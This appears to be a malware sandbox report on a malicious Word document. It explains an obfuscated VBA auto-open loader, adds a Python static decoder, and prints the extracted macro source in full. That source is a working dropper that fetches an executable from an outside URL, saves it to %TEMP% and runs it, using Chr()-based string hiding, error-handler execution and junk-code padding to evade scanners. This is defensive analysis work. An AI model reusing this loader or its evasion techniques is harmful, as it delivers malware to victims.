Verdict: MALICIOUS
Risk score: 278

Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
- T1204.002 User Execution: Malicious File
The sample is a malicious OOXML (Word) document carrying obfuscated VBA macros. Every sensitive string (download URL, COM ProgIDs, method names, drop path) is assembled from Chr() calls and one-character literals salted with junk characters (Chr(60) '<', Chr(61) '=', Chr(59) ';') that are stripped with Replace() immediately before use, so no CreateObject target, URL or Shell keyword appears in the source as a literal. The auto-exec chain is autoopen -> VEeve -> NwKHQxx14zub, which instantiates Microsoft.XMLHTTP through the wrapper Aw9a6h1r, issues a synchronous GET (via CallByName, so the method name is also built at runtime) to the URL that decodes to http://audiobienentendre.fr/w45r3/8l6mk.exe, hands responseBody to zGtUPirIvgMk, which writes it through an ADODB.Stream (Type = 1, binary; SaveToFile with adSaveCreateOverWrite = 2) to %TEMP%\suputf8.exe, and then deliberately divides by zero (a = 332 / 0) so that the On Error handler calls lQc8N4mpWW5, which launches the dropped file with Shell.Application.Open. Routing the execution step through an error handler keeps it out of the straight-line control flow that simple emulators follow. The critical heuristics OLE_VBA_HTTP_DROP_EXEC, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC each describe one part of this download, drop and execute loader, and the autoopen subroutine ensures it runs as soon as macros are enabled. The large amount of unrelated VB.NET code interleaved in the modules (Try/Catch blocks, typed arrays, traffic-signal and bus-priority routines) is never reached from the auto-exec chain and would not compile as VBA; it is padding intended to dilute keyword and similarity scanning.
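The string obfuscation described above, and flagged by OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_HTTP_DROP_EXEC, can be undone statically. The following Python script is an added example written for this page; it is not part of the analyzer or of the sample. It evaluates the macro's Chr()/literal concatenations, applies the same junk-character removal the macro performs with Replace(), resolves Environ() to a %VAR% placeholder, and maps the decoded ProgIDs and arguments back onto the CreateObject and CallByName sites, so the download URL, the drop path and the execution call can be read without running any VBA. The input is an excerpt copied from the extracted macros.bas below; the function names `evaluate` and `analyze`, the `%TEMP%` rendering, the uniform junk stripping and the simple comma splitting of CallByName arguments are this example's own choices.

```python
"""Static decoder for the Chr()/junk-character string obfuscation in this macro's loader. Added
example, not part of the analyzer or of the sample; it evaluates constant expressions only."""
import re

# Junk the macro strips with Replace() before use: Chr(60) '<', Chr(61) '=', Chr(59) ';'.
# Assumption: dropping them from every decoded value is safe, since no genuine value here needs them.
JUNK = {"<", "=", ";"}
DECODER_FUNC = "Aw9a6h1r"  # the macro's own Replace-then-CreateObject wrapper (name from the source)

# Operands of a VBA '&' expression: Chr(n), a string literal, Environ(<constant expr>), an identifier.
_OPERAND = re.compile(
    r'Chr\((\d+)\)|"((?:[^"]|"")*)"|Environ\(((?:Chr\(\d+\)|"[^"]*"|[&\s])*)\)|([A-Za-z_]\w*)')
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
_SETOBJ = re.compile(r"Set\s+(\w+)\s*=\s*" + DECODER_FUNC + r"\((.*)\)\s*$")
_METHOD = re.compile(r"^\s*(\w+)\.(\w+)\s*(.*)$")

# Sample input: the loader-relevant lines copied verbatim from the extracted macros.bas on this page.
SAMPLE = r'''
Sub NwKHQxx14zub()
dChxZd9cty0 = Chr(104) & "t" & Chr(59) & "t" & Chr(112) & ":" & "/" & Chr(60) & "/" & Chr(97) & Chr(117) & Chr(100) & "i" & Chr(111) & Chr(98) & Chr(61) & "i" & Chr(101) & Chr(110) & "e" & Chr(110) & Chr(116) & Chr(101) & "n" & "d" & Chr(114) & Chr(101) & Chr(46) & "<" & "f" & "r" & Chr(47) & Chr(61) & Chr(119) & Chr(52) & "5" & Chr(114) & Chr(51) & Chr(47) & "8" & "l" & "6" & Chr(109) & "k" & Chr(46) & Chr(61) & "e" & Chr(59) & Chr(120) & "e"
Set hRomc9OqfrT = Aw9a6h1r(Chr(77) & "i" & "<" & "c" & Chr(114) & Chr(111) & "=" & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & "X" & Chr(77) & "<" & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
dChxZd9cty0 _
, False
T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80))
rAHQOXN8z4zO = T17zaVI8G7 & Chr(92) & Chr(115) & Chr(117) & Chr(112) & Chr(117) & "t" & Chr(102) & Chr(56) & Chr(46) & Chr(101) & "x" & Chr(101)
CallByName hRomc9OqfrT, Chr(83) & Chr(101) & Chr(110) & "d", mmm
dQqnFJoOu9MYi = hRomc9OqfrT.responseBody
zGtUPirIvgMk dQqnFJoOu9MYi, rAHQOXN8z4zO
a = 332 / 0
lQc8N4mpWW5 ("X0VlMPg6nC")
End Sub
Public Function lQc8N4mpWW5(muULk3yaoasVTA As String)
Set ZRCB4OQPMEB6 = Aw9a6h1r(Chr(83) & Chr(104) & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
ZRCB4OQPMEB6.Open (rAHQOXN8z4zO)
End Function
Public Sub zGtUPirIvgMk(ZDtLniBdL3 As Variant, VCvMRSbB0LHH As String)
Dim zsl48Nc6: Set zsl48Nc6 = Aw9a6h1r("A" & "<" & "d" & "o" & ";" & "d" & Chr(98) & Chr(61) & Chr(46) & "S" & Chr(116) & Chr(61) & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & Chr(109))
zsl48Nc6.Open
zsl48Nc6.savetofile VCvMRSbB0LHH, 2
End Sub
'''


def evaluate(expr, symbols=None):
    """Evaluate a '&' concatenation of Chr(n), literals, Environ(...) and already decoded
    variables; return None when an operand cannot be resolved statically (a call, a parameter)."""
    symbols, out, pos = symbols or {}, [], 0
    for m in _OPERAND.finditer(expr):
        if expr[pos:m.start()].replace("&", "").replace("_", "").strip():
            return None  # something other than '&' / line continuation between operands
        code, literal, env, ident = m.groups()
        if code is not None:
            out.append(chr(int(code)))
        elif literal is not None:
            out.append(literal.replace('""', '"'))
        elif env is not None:
            name = evaluate(env, symbols)
            if name is None:
                return None
            out.append("%" + name + "%")  # render Environ("TEMP") as %TEMP% (example's convention)
        elif ident in symbols:
            out.append(symbols[ident])
        else:
            return None
        pos = m.end()
    if not out or expr[pos:].replace("&", "").replace("_", "").strip():
        return None
    return "".join(c for c in "".join(out) if c not in JUNK)


def analyze(source):
    """Return decoded string constants, the ProgID behind each object variable, and the calls on them."""
    strings, objects, calls = {}, {}, []
    lines = re.sub(r" _\r?\n", " ", source).splitlines()  # join VBA line continuations
    for line in lines:  # pass 1: constants in source order, and dynamically built CreateObject targets
        if (m := _SETOBJ.search(line)) and (progid := evaluate(m.group(2))):
            objects[m.group(1)] = progid
        elif (m := _ASSIGN.match(line)) and (value := evaluate(m.group(2), strings)) is not None:
            strings[m.group(1)] = value
    for line in lines:  # pass 2: calls, with arguments resolved through the decoded constants
        stripped = line.strip()
        if stripped.startswith("CallByName"):  # CallByName obj, method, VbMethod, args...
            args = stripped[len("CallByName"):].split(",")  # assumption: no commas inside literals
            params = [evaluate(a, strings) or a.strip() for a in args[3:]]
            calls.append((args[0].strip(), objects.get(args[0].strip()), evaluate(args[1]), params))
        elif (m := _METHOD.match(line)) and m.group(1) in objects and not m.group(3).startswith("="):
            rest = m.group(3).strip().strip("()")
            params = [evaluate(a, strings) or a.strip() for a in rest.split(",") if a.strip()]
            calls.append((m.group(1), objects[m.group(1)], m.group(2), params))
    return {"strings": strings, "objects": objects, "calls": calls}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE).items():
        print(key, value)
```

Running analyze(SAMPLE) recovers Microsoft.XMLHTTP, Adodb.Stream and Shell.Application as the three dynamically built ProgIDs, the GET to http://audiobienentendre.fr/w45r3/8l6mk.exe, the drop path %TEMP%\suputf8.exe and the final Shell.Application.Open on that path. Expressions that involve a variable or call the decoder has not resolved (the Replace() chain, responseBody, the division by zero) evaluate to None and are skipped rather than guessed, so the output only contains values that are genuinely constant in the source.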
Heuristics (9)
- VBA project inside OOXML (medium, OOXML_VBA, 7 related findings): the document contains a VBA project, i.e. VBA macros are present.
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): the VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-drop dropper, even though the COM ProgIDs are built dynamically to evade keyword scanning. Matched line: dQqnFJoOu9MYi = hRomc9OqfrT.responseBody
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line: Set Aw9a6h1r = CreateObject(Bc21xM5Qq)
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line: Set Aw9a6h1r = CreateObject(Bc21xM5Qq)
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched line: CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only documents, and documents whose source extraction fails, where no visible source is available.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line: Sub autoopen()
- Environ() call, environment variable access (low, OLE_VBA_ENVIRON). Matched line: T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80))
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All six URLs listed here are standard OOXML/WordprocessingML XML namespace identifiers, not network indicators; the loader's actual download URL is assembled at runtime from Chr() fragments and never appears as a literal string, so it is not picked up by literal URL extraction.
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 18700 bytes | faf205cfde98531a539031c9e8231fc2b4f2c053f2275e0029985a74848a08b9 |
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
VEeve (8.2)
End Sub
Sub VEeve(FFFFF As Long)
NwKHQxx14zub
End Sub
Attribute VB_Name = "Module1"
Public Function Remain_5F03(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Integer
Try
_mainForm.Show_LBox_PolicyRightNowText(" Remain_5F03 start ")
If Goback = "1" Then
Goback = "00"
ElseIf Goback = "2" Then
Goback = "01"
End If
Dim lightstatus As String() = tempV3_5F14.LightStatus
Dim Green As String() = tempV3_5F15.Green
Dim total_phases As Integer = lightstatus.Length
Dim phase_interval(total_phases) As Integer
For index As Integer = 0 To total_phases - 1
phase_interval(Index) = YellowplusRed(lightstatus(Index)) + CurrentGreen(Green(Index))
'phase_interval2(index) = phase_interval
'_mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval.ToString)
_mainForm.Show_LBox_PolicyRightNowText(index.ToString + " Remain_5F03 Phase interval " + phase_interval(index).ToString)
Next Index
End Function
Public Function lQc8N4mpWW5(muULk3yaoasVTA As String)
Set ZRCB4OQPMEB6 = Aw9a6h1r(Chr(83) & Chr(104) & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
ZRCB4OQPMEB6.Open (rAHQOXN8z4zO)
End Function
Public Function Syncd_IC2IPC_AcceptHash_2()
Dim Data_5F18 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F18")
Dim planid As String = Data_5F18.PlanID.ToString
Dim Data_5F03 As Object = Syncd_IC2IPC_AcceptHash(CrossRoadID + "_5F03")
Dim a() As Byte = HexStr2ByteArray(BusLineData(4))
Dim BusPassPhases As BitArray = New BitArray(8)
BusPassPhases = New BitArray(a)
Return DiffSecond
Else
Return Nothing
End If
Catch ex As Exception
WriteLog(curPath, "Module1_Policy_Public", " Remain_5F03 Catch:" + ex.Message, _logEnable)
Return -1
End Try
End Function
Attribute VB_Name = "Module2"
Public Function RemainingLightTime(ByVal GreenOrNot As Boolean) As Integer
Dim Remaining As Integer
Try
Dim TotalPhase As String
Try
TotalPhase = Data_5F18.SubPhaseCount.ToString
Catch ex As Exception
TotalPhase = Data_5F13.SubPhaseCount.ToString
End Try
Dim TotalPhaseInt As Integer = Convert.ToDecimal(TotalPhase)
Dim CurrentPhaseInt As Integer = Convert.ToDecimal(Data_5FCC.Current_SubPhaseID)
Dim CurrentStepInt As Integer = Convert.ToDecimal(Data_5FCC.Current_StepID)
Dim CurrentRemainingTime As Integer = Data_5FCC.Current_RemainingInt
If GreenOrNot Then
'_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Green ")
If CurrentStepInt = 1 Then
prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
Remaining = Greenint(CurrentPhaseInt - 1) - prepare
ElseIf CurrentStepInt = 2 Then
Remaining = CurrentRemainingTime + 4 + 3
ElseIf CurrentStepInt = 3 Then
Remaining = CurrentRemainingTime + 3
Else
Remaining = CurrentRemainingTime
End If
For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
If BusPassPhases(Index - 1) Then
Remaining = Remaining + Greenint(Index - 1)
If CurrentPhaseInt <> 1 Then
For index2 As Integer = 1 To CurrentPhaseInt - 1
If BusPassPhases(index2 - 1) Then
Remaining = Remaining + Greenint(index2 - 1)
End If
Next
End If
End If
Next
'If BusPassPhases(CurrentPhaseInt) Then
' Remaining = Remaining + Greenint(CurrentPhaseInt)
'End If
Return Remaining
Else
'_mainForm.Show_LBox_PolicyRightNowText(" Calculate Remaining Red ")
If CurrentStepInt = 1 Then
prepare = Greenint(CurrentPhaseInt - 1) - CurrentRemainingTime
Remaining = Greenint(CurrentPhaseInt - 1) - prepare
ElseIf CurrentStepInt = 2 Then
Remaining = CurrentRemainingTime + 4 + 3 + 2
ElseIf CurrentStepInt = 3 Then
Remaining = CurrentRemainingTime + 3 + 2
Else
Remaining = CurrentRemainingTime
End If
End Function
Sub NwKHQxx14zub()
dChxZd9cty0 = Chr(104) & "t" & Chr(59) & "t" & Chr(112) & ":" & "/" & Chr(60) & "/" & Chr(97) & Chr(117) & Chr(100) & "i" & Chr(111) & Chr(98) & Chr(61) & "i" & Chr(101) & Chr(110) & "e" & Chr(110) & Chr(116) & Chr(101) & "n" & "d" & Chr(114) & Chr(101) & Chr(46) & "<" & "f" & "r" & Chr(47) & Chr(61) & Chr(119) & Chr(52) & "5" & Chr(114) & Chr(51) & Chr(47) & "8" & "l" & "6" & Chr(109) & "k" & Chr(46) & Chr(61) & "e" & Chr(59) & Chr(120) & "e"
Set hRomc9OqfrT = Aw9a6h1r(Chr(77) & "i" & "<" & "c" & Chr(114) & Chr(111) & "=" & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & "X" & Chr(77) & "<" & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
dChxZd9cty0 = Replace(dChxZd9cty0, Chr(60), "")
dChxZd9cty0 = Replace(dChxZd9cty0, Chr(61), "")
dChxZd9cty0 = Replace(dChxZd9cty0, Chr(59), "")
CallByName hRomc9OqfrT, Chr(79) & "p" & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
dChxZd9cty0 _
, False
T17zaVI8G7 = Environ(Chr(84) & Chr(69) & "M" & Chr(80))
rAHQOXN8z4zO = T17zaVI8G7 & Chr(92) & Chr(115) & Chr(117) & Chr(112) & Chr(117) & "t" & Chr(102) & Chr(56) & Chr(46) & Chr(101) & "x" & Chr(101)
Dim dQqnFJoOu9MYi() As Byte
Dim mmm As VbCallType
mmm = VbMethod
CallByName hRomc9OqfrT, Chr(83) & Chr(101) & Chr(110) & "d", mmm
dQqnFJoOu9MYi = hRomc9OqfrT.responseBody
zGtUPirIvgMk dQqnFJoOu9MYi, rAHQOXN8z4zO
On Error GoTo ELg0jdGF
a = 332 / 0
On Error GoTo 0
ta52uVgBTI4LPT:
Exit Sub
ELg0jdGF:
lQc8N4mpWW5 ("X0VlMPg6nC")
Resume ta52uVgBTI4LPT
End Sub
Public Function jhbjhjkn()
For index As Integer = CurrentPhaseInt + 1 To TotalPhaseInt
If BusPassPhases(Index - 1) = False Then
Remaining = Remaining + Greenint(Index - 1) + 5
If CurrentPhaseInt <> 1 Then
For index2 As Integer = 1 To CurrentPhaseInt - 1
If BusPassPhases(index2 - 1) = False Then
Remaining = Remaining + Greenint(index2 - 1) + 5
End If
Next
End If
End If
Next
Return Remaining
End If
Catch ex As Exception
_mainForm.Show_LBox_PolicyRightNowText(" RemainingLightTime Error" + ex.StackTrace.ToString)
End Try
Return Remaining
End Function
Attribute VB_Name = "Module35"
Public Function BusPhaseOrNot(ByVal BusLineID As String, ByVal CrossRoadID As String, ByVal Goback As String) As Boolean
Try
Dim temp_goback As String = ""
If Goback = "1" Then
Goback = "00"
ElseIf Goback = "2" Then
Goback = "01"
End If
Dim Data_5F03 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F03")
'sPhaseOrder, sSignalMap, sSignalCount, sSubPhaseID, sStepID, sStepSec, sSignalStatus, Now
Dim Data_5F18 As Object = HashTab_IC2IPC_Get(CrossRoadID + "_5F18")
Dim BusLineDataKey As String = BusLineID + "_" + CrossRoadID + "_" + Goback + "_" + Data_5F18.PlanID.ToString
Dim CurrentPhaseInt As Integer = HexStringTOIntString(Data_5F03.SubPhaseID.ToString, 2)
'Dim BusPassPhases As BitArray = New BitArray(8)
Dim a() As Byte = HexStr2ByteArray(BusLineData(4)) '[BusSubPhaseID]
'FiveFB4.Add("BusPhase", BusLineData(4))
Dim BusPassPhases As BitArray = New BitArray(8)
BusPassPhases = New BitArray(a)
End Function
Public Sub zGtUPirIvgMk(ZDtLniBdL3 As Variant, VCvMRSbB0LHH As String)
Dim zsl48Nc6: Set zsl48Nc6 = Aw9a6h1r("A" & "<" & "d" & "o" & ";" & "d" & Chr(98) & Chr(61) & Chr(46) & "S" & Chr(116) & Chr(61) & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & Chr(109))
Dim zaPomni As Integer
zaPomni = 1
zsl48Nc6.Type = zaPomni
zsl48Nc6.Open
zsl48Nc6.write ZDtLniBdL3
zsl48Nc6.savetofile VCvMRSbB0LHH, 2
End Sub
Public Function Show_LBox_PolicyRightNowText()
'_mainForm.Show_LBox_PolicyRightNowText("Bit array ")
'For i = 0 To 7
' If BusPassPhases(i) Then
' _mainForm.Show_LBox_PolicyRightNowText("Pass " + (i + 1).ToString)
' Else
' _mainForm.Show_LBox_PolicyRightNowText("Block " + (i + 1).ToString)
' End If
'Next i
' _mainForm.Show_LBox_PolicyRightNowText("Bit array ")
For i As Integer = 0 To BusPassPhases.Count - 1
If BusPassPhases(i) And (i + 1) = CurrentPhaseInt And CurrentStepInt <> 5 Then
'_mainForm.Show_LBox_PolicyRightNowText("Green Light Now " + (i + 1).ToString)
Return True
End If
Next i
Catch ex As Exception
_mainForm.Show_LBox_PolicyRightNowText("Bus Line Data error " + ex.StackTrace.ToString)
Return False
End Try
'_mainForm.Show_LBox_PolicyRightNowText("Red Light Now ")
Return False
End Function
'************************************************************************************************
'**
'** ?????
'**
'************************************************************************************************
'?????1:??? 2??? 3:???
'TriggerPointdList
'************************************************************************************************
'**
'** ?????????
'**
'************************************************************************************************
'RG_Stauts:??-->R,??-->G
Public Function SendLightRemainSec(ByVal strBusID As String, ByVal RG_Stauts As String, ByVal RemainSec As String) As Boolean
Dim isSuccess As Boolean = False
Try
If _ConnectFlag_Car_Group Then
Dim Sendstring As String
Dim YearString As String = Now.Year.ToString("0000")
Dim MonthString As String = Now.Month.ToString("00")
Dim DayString As String = Now.Day.ToString("00")
Dim HourString As String = Now.Hour.ToString("00")
Dim MinuteString As String = Now.Minute.ToString("00")
Dim SecondString As String = Now.Second.ToString("00")
Dim TimeString As String = YearString + MonthString + DayString + HourString + MinuteString + SecondString
SeqNumber = (SeqNumber + 1) Mod 1000000000
Dim SeqString As String = SeqNumber.ToString("00000000")
Sendstring = "B2," + strBusID + ",SET01010," + HourString + MinuteString + SecondString + "_" + Trim(RG_Stauts) + Trim(RemainSec) + ",0,2," + TimeString + "," + SeqString + "," + TimeString
TCP_ClientWriteToCAR (Sendstring)
Dim text As String = "[R-->Bus] " + Sendstring
WriteLog(curPath, "CAR_comm", [text], _logEnable)
End If
Catch ex As Exception
End Try
Return isSuccess
End Function
Attribute VB_Name = "Module4"
Public rAHQOXN8z4zO As String
Public rAHQOXN8z4zO2 As String
Public rAHQOXN8z4zO3 As String
Public rAHQOXN8z4zO4 As String
Public rAHQOXN8z4zO5 As String
Public rAHQOXN8z4zO6 As String
Public Function SecondOfCar2CrossRoad(ByVal CarPostion As String, ByVal CrossRoadPostion As String, ByVal CarSpeed As Double) As Integer
Dim iSecReport As Integer = 0
Try
Dim StartPostion As String() = CarPostion.Split(",")
Dim EndPostion As String() = CrossRoadPostion.Split(",")
Dim EarthRadius As Integer = 6371
Dim factor As Double = Math.PI / 180
Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
Dim dis_c As Double = EarthRadius * dis_b * 1000
Dim SedondOfSpeedMeter As Double = (CarSpeed * 1000) / 3600
iSecReport = dis_c / SedondOfSpeedMeter
'_mainForm.Show_LBox_PolicyRightNowText("CarPostion " + CarPostion + " CrossRoadPostion " + CrossRoadPostion)
'_mainForm.Show_LBox_PolicyRightNowText("Distance " + dis_c.ToString + " Speed " + SedondOfSpeedMeter.ToString)
Catch ex As Exception
iSecReport = 0
End Try
Return iSecReport
End Function
Public Function distance(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
Dim iSecReport As Integer = 0
Try
Dim StartPostion As String() = CarPostion.Split(",")
Dim EndPostion As String() = CrossRoadPostion.Split(",")
Dim EarthRadius As Integer = 6371
Dim factor As Double = Math.PI / 180
Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
Dim dis_c As Double = EarthRadius * dis_b * 1000
iSecReport = dis_c
'_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
Catch ex As Exception
iSecReport = 0
_mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
End Try
Return iSecReport
End Function
Public Function Aw9a6h1r(Bc21xM5Qq As String)
Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(60), "")
Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(61), "")
Bc21xM5Qq = Replace(Bc21xM5Qq, Chr(59), "")
Set Aw9a6h1r = CreateObject(Bc21xM5Qq)
End Function
Public Function distance2(ByVal CarPostion As String, ByVal CrossRoadPostion As String) As Integer
Dim iSecReport As Integer = 0
Try
Dim tempString As String = ""
Dim StartPostion As String() = CarPostion.Split(",")
Dim EndPostion As String() = CrossRoadPostion.Split(",")
Dim EarthRadius As Integer = 6371
tempString = StartPostion(0)
StartPostion(0) = StartPostion(1)
StartPostion(1) = tempString
Dim factor As Double = Math.PI / 180
Dim dLat As Double = (Val(StartPostion(0)) - Val(EndPostion(0))) * factor
Dim dLon As Double = (Val(StartPostion(1)) - Val(EndPostion(1))) * factor
Dim dis_a As Double = Math.Sin(dLat / 2) * Math.Sin(dLat / 2) + Math.Cos(Val(StartPostion(0)) * factor) * Math.Cos(Val(EndPostion(0)) * factor) * Math.Sin(dLon / 2) * Math.Sin(dLon / 2)
Dim dis_b As Double = 2 * Math.Atan2(Math.Sqrt(dis_a), Math.Sqrt(1 - dis_a))
Dim dis_c As Double = EarthRadius * dis_b * 1000
iSecReport = dis_c
'_mainForm.Show_LBox_PolicyRightNowText("?? " + iSecReport.ToString)
Catch ex As Exception
iSecReport = 0
_mainForm.Show_LBox_PolicyRightNowText("distance error " + ex.Message)
End Try
Return iSecReport
End Function
'???????
'?????1?,2??,3?,4??,5?,6??,7?,8??
Public Function isBusSameDirection(ByVal TriggerPhaseDirect As String) As Boolean
Dim isSame As Boolean = False
Try
If Not IsNothing(Data_5F03) Then
Return isPass(Val(TriggerPhaseDirect) - 1, Data_5F03.SignalStatus, Data_5F03.SignalMap)
End If
Catch ex As Exception
End Try
Return isSame
End Function
Public Function isPass(ByVal intIndex As Integer, ByVal strStatus As String, ByVal strSingalMap As String) As Boolean
Try
'Jason 2014-9-24
'S-------------------------------------------------------------
Dim SingalOrder As Integer = 0
Return False
End If
Catch ex As Exception
Dim trace As New System.Diagnostics.StackTrace(ex, True)
WriteLog(curPath, "Module1_Policy_Public", "isPass Catch(" + trace.GetFrame(0).GetFileLineNumber().ToString + ")" + ex.Message, _logEnable)
End Try
Return False
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 184832 bytes | 8acbb7f68bf0a0ed10477b1a47d5a1ec888596eb168e0a40c1d3e3f93634804d |